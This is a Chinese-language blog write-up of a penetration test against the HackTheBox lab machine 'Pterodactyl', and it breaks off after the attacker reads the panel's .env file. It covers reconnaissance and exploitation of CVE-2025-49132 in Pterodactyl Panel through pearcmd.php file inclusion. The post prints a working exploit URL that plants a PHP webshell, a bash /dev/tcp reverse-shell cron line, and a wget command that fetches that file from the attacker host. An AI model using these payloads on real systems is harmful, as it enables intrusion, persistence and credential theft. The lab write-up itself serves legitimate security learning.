{"id":393,"date":"2026-02-09T12:40:45","date_gmt":"2026-02-09T04:40:45","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=393"},"modified":"2026-05-10T09:49:42","modified_gmt":"2026-05-10T01:49:42","slug":"393","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2026\/02\/09\/393\/","title":{"rendered":"HTB\u9776\u673a Pterodactyl \u6e17\u900f\u6d4b\u8bd5\u8bb0\u5f55"},"content":{"rendered":"
\n

\u76ee\u6807\u4fe1\u606f<\/h1>\n

IP\u5730\u5740\uff1a<\/strong>10.129.174.98<\/code>\uff08\u975e\u56fa\u5b9aIP\u5730\u5740\uff09<\/strong><\/p><\/blockquote>\n

\n

\u4fe1\u606f\u6536\u96c6<\/h1>\n

ICMP\u68c0\u6d4b<\/h2>\n
PING 10.129.174.98 (10.129.174.98) 56(84) bytes of data.\n64 bytes from 10.129.174.98: icmp_seq=1 ttl=63 time=122 ms\n64 bytes from 10.129.174.98: icmp_seq=2 ttl=63 time=145 ms\n64 bytes from 10.129.174.98: icmp_seq=3 ttl=63 time=81.3 ms\n64 bytes from 10.129.174.98: icmp_seq=4 ttl=63 time=164 ms\n\n--- 10.129.174.98 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3005ms\nrtt min\/avg\/max\/mdev = 81.338\/128.058\/163.731\/30.780 ms<\/code><\/pre>\n
\u653b\u51fb\u673a\u548c\u9776\u673a\u95f4\u7f51\u7edc\u8fde\u63a5\u72b6\u6001\u826f\u597d\u3002<\/p>\n
\u9632\u706b\u5899\u68c0\u6d4b<\/h2>\n
# Nmap 7.98 scan initiated Sun Feb  8 08:35:50 2026 as: \/usr\/lib\/nmap\/nmap -sA -p- --min-rate 3000 -oN ack_report.txt 10.129.174.98\nNmap scan report for 10.129.174.98\nHost is up (0.082s latency).\nNot shown: 65481 filtered tcp ports (no-response), 50 filtered tcp ports (admin-prohibited)\nPORT     STATE      SERVICE\n22\/tcp   unfiltered ssh\n80\/tcp   unfiltered http\n443\/tcp  unfiltered https\n8080\/tcp unfiltered http-proxy\n\n# Nmap done at Sun Feb  8 08:36:35 2026 -- 1 IP address (1 host up) scanned in 45.14 seconds<\/code><\/pre>\n
\u9776\u673a\u7591\u4f3c\u5f00\u653e4<\/code>\u4e2aTCP<\/code>\u7aef\u53e3\u3002<\/p>\n
\u7f51\u7edc\u7aef\u53e3\u626b\u63cf<\/h2>\n
TCP<\/strong><\/code>\u7aef\u53e3\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
# Nmap 7.98 scan initiated Sun Feb  8 08:37:37 2026 as: \/usr\/lib\/nmap\/nmap -sT -sV -A -p- --min-rate 3000 -oN tcp_report.txt 10.129.174.98\nNmap scan report for 10.129.174.98\nHost is up (0.11s latency).\nNot shown: 65485 filtered tcp ports (no-response), 46 filtered tcp ports (host-unreach)\nPORT     STATE  SERVICE    VERSION\n22\/tcp   open   ssh        OpenSSH 9.6 (protocol 2.0)\n| ssh-hostkey: \n|   256 a3:74:1e:a3:ad:02:14:01:00:e6:ab:b4:18:84:16:e0 (ECDSA)\n|_  256 65:c8:33:17:7a:d6:52:3d:63:c3:e4:a9:60:64:2d:cc (ED25519)\n80\/tcp   open   http       nginx 1.21.5\n|_http-server-header: nginx\/1.21.5\n|_http-title: Did not follow redirect to http:\/\/pterodactyl.htb\/\n443\/tcp  closed https\n8080\/tcp closed http-proxy\nAggressive OS guesses: Linux 5.0 - 5.14 (98%), Linux 4.15 - 5.19 (94%), Linux 2.6.32 - 3.13 (93%), Linux 5.0 (92%), OpenWrt 22.03 (Linux 5.10) (92%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (92%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.14 (90%), Linux 4.15 (90%), Linux 2.6.32 - 3.10 (90%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 2 hops\n\nTRACEROUTE (using proto 1\/icmp)\nHOP RTT       ADDRESS\n1   123.39 ms 10.10.16.1\n2   123.60 ms 10.129.174.98\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Sun Feb  8 08:38:41 2026 -- 1 IP address (1 host up) scanned in 64.08 seconds<\/code><\/pre>\n
UDP<\/strong><\/code>\u7aef\u53e3\u5f00\u653e\u5217\u8868\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
# Nmap 7.98 scan initiated Sun Feb  8 08:39:31 2026 as: \/usr\/lib\/nmap\/nmap -sU -p- --min-rate 3000 -oN udp_ports.txt 10.129.174.98\nWarning: 10.129.174.98 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.129.174.98\nHost is up (0.090s latency).\nAll 65535 scanned ports on 10.129.174.98 are in ignored states.\nNot shown: 65290 open|filtered udp ports (no-response), 245 filtered udp ports (admin-prohibited)\n\n# Nmap done at Sun Feb  8 08:43:32 2026 -- 1 IP address (1 host up) scanned in 241.44 seconds<\/code><\/pre>\n
UDP<\/strong><\/code>\u7aef\u53e3\u8be6\u7ec6\u4fe1\u606f\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
\uff08\u65e0\uff09<\/code><\/pre>\n
\u540c\u65f6\u53d1\u73b0\u9776\u673a\u8fd0\u884cLinux<\/code>\u64cd\u4f5c\u7cfb\u7edf\uff0c\u5f00\u653e\u4e8622\/ssh<\/code>\u548c80\/http<\/code>\u670d\u52a1\uff0c\u4e3b\u57df\u540d\u4e3apterodactyl.htb<\/code>\u3002<\/p>\n
\n
\u670d\u52a1\u63a2\u6d4b<\/h1>\n
SSH\u670d\u52a1\uff0822\u7aef\u53e3\uff09<\/h2>\n
\u5c1d\u8bd5\u4f7f\u7528ssh<\/code>\u5de5\u5177\u8fde\u63a5\u9776\u673a\uff1a<\/p>\n
ssh root@pterodactyl.htb<\/code><\/pre>\n
<\/p>\n
\"\"<\/p>\n
Web\u5e94\u7528\u7a0b\u5e8f\uff0880\u7aef\u53e3\uff09<\/h2>\n
\u5728\u5f00\u59cb\u8fdb\u884cWeb<\/code>\u5e94\u7528\u63a2\u6d4b\u524d\uff0c\u9996\u5148\u8fdb\u884c\u865a\u62df\u4e3b\u673a\u540d\u7206\u7834\uff1a<\/p>\n
wfuzz -w \/usr\/share\/wordlists\/seclists\/Discovery\/DNS\/bitquark-subdomains-top100000.txt -t 70 -u 10.129.10.249 -H \"Host: FUZZ.pterodactyl.htb\" --hh 145 --hc 400<\/code><\/pre>\n
<\/p>\n
\"\"<\/p>\n
\u53d1\u73b0\u9776\u673aWeb<\/code>\u670d\u52a1\u5b58\u5728panel<\/code>\u865a\u62df\u4e3b\u673a\u3002<\/p>\n
\u9996\u5148\u6253\u5f00\u4e3b\u7ad9\u70b9\uff1ahttp:\/\/pterodactyl.htb\/<\/code><\/p>\n
<\/p>\n
\"\"<\/p>\n
\u8be5\u7ad9\u70b9\u8c8c\u4f3c\u4e3a\u81ea\u5efa\u7684Minecraft<\/code>\u6e38\u620f\u670d\u52a1\u5668\uff0c\u4e3b\u9875\u4e0a\u9664\u4e86\u4e00\u4e2a\u5e76\u4e0d\u5b58\u5728\u7684\u5b50\u57df\u540dplay.pterodactyl.htb<\/code>\u5916\uff0c\u8fd8\u6709\u4e00\u4e2aChangelog<\/code>\u94fe\u63a5\u3002<\/p>\n
\u70b9\u51fb\u8be5\u94fe\u63a5\uff0c\u9875\u9762\u8df3\u8f6c\u5230\u4e86\/changelog.txt<\/code>\uff0c\u5185\u5bb9\u5982\u4e0b\uff1a<\/p>\n
MonitorLand - CHANGELOG.txt\n======================================\n\nVersion 1.20.X\n\n[Added] Main Website Deployment\n--------------------------------\n- Deployed the primary landing site for MonitorLand.\n- Implemented homepage, and link for Minecraft server.\n- Integrated site styling and dark-mode as primary.\n\n[Linked] Subdomain Configuration\n--------------------------------\n- Added DNS and reverse proxy routing for play.pterodactyl.htb.\n- Configured NGINX virtual host for subdomain forwarding.\n\n[Installed] Pterodactyl Panel v1.11.10\n--------------------------------------\n- Installed Pterodactyl Panel.\n- Configured environment:\n  - PHP with required extensions.\n  - MariaDB 11.8.3 backend.\n\n[Enhanced] PHP Capabilities\n-------------------------------------\n- Enabled PHP-FPM for smoother website handling on all domains.\n- Enabled PHP-PEAR for PHP package management.\n- Added temporary PHP debugging via phpinfo()<\/code><\/pre>\n
\u66f4\u65b0\u65e5\u5fd7\u4e2d\u79f0\uff0c\u7ad9\u70b9\u5b89\u88c5\u4e86\u7ffc\u9f99\u9762\u677fv1.11.10<\/code>\u7248\u672c\u4f5c\u4e3a\u6e38\u620f\u670d\u52a1\u5668\u7684\u7ba1\u7406\u7cfb\u7edf\uff0c\u9664\u6b64\u4e4b\u5916\u8fd8\u542f\u7528\u4e86PHP-PEAR<\/code>\u4f5c\u4e3a\u529f\u80fd\u652f\u6301\uff0c\u5e76\u6dfb\u52a0\u4e86\u4e00\u4e2aphpinfo<\/code>\u9875\u9762\u3002<\/p>\n
\u76f4\u63a5\u626b\u63cf\u76ee\u5f55\uff1a<\/p>\n
dirsearch -u http:\/\/pterodactyl.htb -x 400,403,404 -t 70 -e php,js,html,txt,zip,tar.gz,xml,json,log,md<\/code><\/pre>\n
<\/p>\n
\"\"<\/p>\n
\u53d1\u73b0PHPInfo<\/code>\u7a0b\u5e8f\u6587\u4ef6\uff0c\u4f7f\u7528\u6d4f\u89c8\u5668\u8bbf\u95ee\uff0c\u5927\u81f4\u67e5\u770bPHP<\/code>\u914d\u7f6e\u4fe1\u606f\uff1ahttp:\/\/pterodactyl.htb\/phpinfo.php<\/code><\/p>\n
<\/p>\n
\"\"<\/p>\n
\u5728\u7ffb\u9605\u914d\u7f6e\u4fe1\u606f\u7684\u8fc7\u7a0b\u4e2d\uff0c\u53d1\u73b0PHP<\/code>\u63d2\u4ef6\u7a0b\u5e8f\u7684\u5b58\u653e\u8def\u5f84\u4e3a\/usr\/share\/php\/PEAR<\/code>\uff1a<\/p>\n
<\/p>\n
\"\"<\/p>\n
\u8bbf\u95ee\u5b50\u7ad9\u70b9http:\/\/panel.pterodactyl.htb<\/code>\uff1a<\/p>\n
<\/p>\n
\"\"<\/p>\n
\u663e\u7136\u8be5\u5b50\u7ad9\u70b9\u8fd0\u884c\u7ffc\u9f99\u9762\u677f\u3002<\/p>\n
\u9664\u6b64\u4e4b\u5916\uff0c\u672a\u53d1\u73b0\u5176\u5b83\u4fe1\u606f\u3002<\/p>\n
\n
\u6e17\u900f\u6d4b\u8bd5<\/h1>\n
\u7ffc\u9f99\u9762\u677f\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u5229\u7528<\/h2>\n
\u5728\u670d\u52a1\u63a2\u6d4b\u9636\u6bb5\uff0c\u6211\u4eec\u5df2\u7ecf\u53d1\u73b0\u9776\u673aWeb<\/code>\u670d\u52a1panel<\/code>\u5b50\u7ad9\u70b9\u8fd0\u884c\u7ffc\u9f99\u9762\u677f\uff0c\u6839\u636e\u4e3b\u7ad9\u70b9\u5185\u66f4\u65b0\u65e5\u5fd7\u63cf\u8ff0\uff0c\u7ffc\u9f99\u9762\u677f\u7248\u672c\u4e3av1.11.10<\/code>\uff0c\u5e76\u5b89\u88c5\u4e86PHP-Pear<\/code>\u63d2\u4ef6\uff0c\u73b0\u5728\u5c1d\u8bd5\u5bf9\u5176\u8fdb\u884c\u679a\u4e3e\u3002<\/p>\n
\u9996\u5148\u8054\u7f51\u67e5\u8be2\u8be5\u7248\u672c\u7ffc\u9f99\u9762\u677f\u7684\u516c\u5f00\u6f0f\u6d1e\uff1aCVE-2025-49132 \u2014 Pterodactyl Panel \u672a\u6388\u6743\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\u6df1\u5ea6\u7814\u7a76\u62a5\u544a - FreeBuf\u7f51\u7edc\u5b89\u5168\u884c\u4e1a\u95e8\u6237<\/a><\/p>\n
<\/p>\n
\"\"<\/p>\n
\u6210\u529f\u53d1\u73b0\u672a\u6388\u6743\u8fdc\u7a0b\u6587\u4ef6\u5305\u542b\u6f0f\u6d1eCVE-2025-49132<\/code>\uff01\u901a\u8fc7\u9605\u8bfb\u6587\u7ae0\u5206\u6790\u90e8\u5206\uff0c\u53ef\u5f97\u77e5\u8be5\u6f0f\u6d1e\u7684\u672c\u8d28\u4e3aPHP<\/code>\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u3002\u7ffc\u9f99\u9762\u677f\/locales\/locale.json<\/code>\u63a5\u53e3\u63a5\u6536locale<\/code>\u548cnamespace<\/code>\u4e24\u4e2a\u53c2\u6570\uff0c\u5e76\u5728\u672a\u7ecf\u4efb\u4f55\u8fc7\u6ee4\u68c0\u67e5\u7684\u60c5\u51b5\u4e0b\uff0c\u5c31\u5c06\u5176\u62fc\u63a5\u5230\u8bb0\u5f55PHP<\/code>\u6587\u4ef6\u8def\u5f84\u7684\u5b57\u7b26\u4e32\u4e2d\uff08\u5b57\u7b26\u4e32\u6700\u540e\u4e3a.php<\/code>\uff0c\u65e0\u6cd5\u8fdb\u884c\u622a\u65ad\u7b49\u64cd\u4f5c\uff09\uff0c\u968f\u540e\u76f4\u63a5\u5c06\u62fc\u63a5\u540e\u7684\u6587\u4ef6\u8def\u5f84\u5b57\u7b26\u4e32\u4f20\u9012\u7ed9\u4e86Laravel FileLoader<\/code>\u7c7b\u7684load<\/code>\u65b9\u6cd5\u4e2d\uff0c\u5bfc\u81f4\u672a\u901a\u8fc7\u6388\u6743\u653b\u51fb\u8005\u53ef\u4ee5\u52a0\u8f7d\u4efb\u610fPHP<\/code>\u811a\u672c\u6267\u884c\u3002\u7531\u4e8e\u7ffc\u9f99\u9762\u677f\u9700\u8981\u4f7f\u7528PHP-Pear<\/code>\u63d2\u4ef6\uff0c\u653b\u51fb\u8005\u53ef\u901a\u8fc7\u5305\u542bpearcmd.php<\/code>\u7ec4\u4ef6\u7684\u65b9\u6cd5\u5199\u5165\u6076\u610fPHP<\/code>\u811a\u672c\uff0c\u968f\u540e\u518d\u6b21\u5229\u7528\u8be5\u6f0f\u6d1e\u52a0\u8f7d\u65b0\u5199\u5165\u7684\u811a\u672c\uff0c\u8fdb\u884c\u4efb\u610f\u4ee3\u7801\u6267\u884c\u64cd\u4f5c\u3002<\/p>\n
\u6ce8\uff1a\u5173\u4e8epearcmd.php<\/code>\u811a\u672c\u7684\u5229\u7528\u65b9\u6cd5\uff0c\u53ef\u53c2\u8003\u6587\u7ae0LFI TO RCE\u4e4bpearcmd.php\u7684\u5999\u7528-CSDN\u535a\u5ba2<\/a>\u3002<\/p><\/blockquote>\n
\u73b0\u5728\u5bf9\u8be5\u6f0f\u6d1e\u8fdb\u884c\u5229\u7528\uff0c\u9996\u5148\u6839\u636e\u6f0f\u6d1e\u539f\u7406\uff0c\u6784\u9020\u51fa\u5229\u7528URL<\/code>\uff0c\u521b\u5efaPHP<\/code>\u540e\u95e8\uff1a<\/p>\n
http:\/\/panel.pterodactyl.htb\/locales\/locale.json?+config-create+\/&locale=..\/..\/..\/..\/..\/..\/usr\/share\/php\/PEAR&namespace=pearcmd&\/<?=system($_GET['cmd'])?>+\/tmp\/shell.php<\/code><\/pre>\n
\u968f\u540e\u6253\u5f00BurpSuite<\/code>\uff0c\u62e6\u622a\u4e00\u4e2a\u6b63\u5e38\u7684GET<\/code>\u8bf7\u6c42\uff0c\u5c06\u5176\u53d1\u9001\u81f3Repeater<\/code>\uff0c\u7136\u540e\u6dfb\u52a0\u6076\u610f\u8bf7\u6c42\u53c2\u6570\uff1a<\/p>\n
<\/p>\n
\"\"<\/p>\n
\u5199\u5165\u6587\u4ef6\u6210\u529f\uff01\u73b0\u5728\u518d\u6b21\u5229\u7528\u6f0f\u6d1e\uff0c\u5305\u542b\u521b\u5efa\u7684PHP<\/code>\u6728\u9a6c\uff1ahttp:\/\/panel.pterodactyl.htb\/locales\/locale.json?locale=..\/..\/..\/..\/..\/tmp&namespace=shell&cmd=id<\/code><\/p>\n
<\/p>\n
\"\"<\/p>\n
\u6210\u529f\u521b\u5efa\u6076\u610f\u6728\u9a6c\uff01\u76f4\u63a5\u5728\u672c\u5730\u65b0\u5efa\u53cd\u5f39Shell<\/code>\u8ba1\u5212\u4efb\u52a1\u914d\u7f6e\u6587\u4ef6\uff0c\u540c\u65f6\u6253\u5f00SimpleHTTPServer<\/code>\u76d1\u542c\uff1a<\/p>\n
*\/1 * * * * \/bin\/bash -c 'bash -i >& \/dev\/tcp\/10.10.16.6\/443 0>&1'<\/code><\/pre>\n
\u968f\u540e\u4f7f\u7528PHP<\/code>\u6728\u9a6c\u6267\u884c\u547d\u4ee4\uff0c\u4e0b\u8f7d\u5e76\u6dfb\u52a0\u6076\u610f\u8ba1\u5212\u4efb\u52a1\uff1a<\/p>\n
wget http:\/\/10.10.16.6\/revshell_cron.txt -O \/tmp\/revshell_cron.txt\ncat \/tmp\/revshell_cron.txt | crontab<\/code><\/pre>\n
\u6253\u5f00netcat<\/code>\u76d1\u542c\uff0c\u7b49\u5f85\u4e00\u4f1a\u513f\u540e\uff0c\u6210\u529f\u6536\u5230\u53cd\u5f39Shell<\/code>\uff1a<\/p>\n
<\/p>\n
\"\"<\/p>\n
\u53d1\u73b0\u9776\u673a\u8fd0\u884copenSUSE Leap v15.6<\/code>\u64cd\u4f5c\u7cfb\u7edf\u3002<\/p>\n
\u7206\u7834phileasfogg3\u7528\u6237\u5bc6\u7801<\/h2>\n
\u8fdb\u5165\u7cfb\u7edf\u540e\uff0c\u6267\u884c\u6570\u636e\u5e93\u679a\u4e3e\u3002\u5728\u7ffc\u9f99\u9762\u677f\u5b89\u88c5\u76ee\u5f55\/var\/www\/pterodactyl\/<\/code>\u4e0b\u53d1\u73b0\u73af\u5883\u53d8\u91cf\u914d\u7f6e\u6587\u4ef6.env<\/code>\uff1a<\/p>\n
cd \/var\/www\/pterodactyl\ncat .env<\/code><\/pre>\n
<\/p>\n
\"\"<\/p>\n
\u6210\u529f\u53d1\u73b0\u6570\u636e\u5e93\u7528\u6237\u51ed\u636e\uff1a<\/p>\n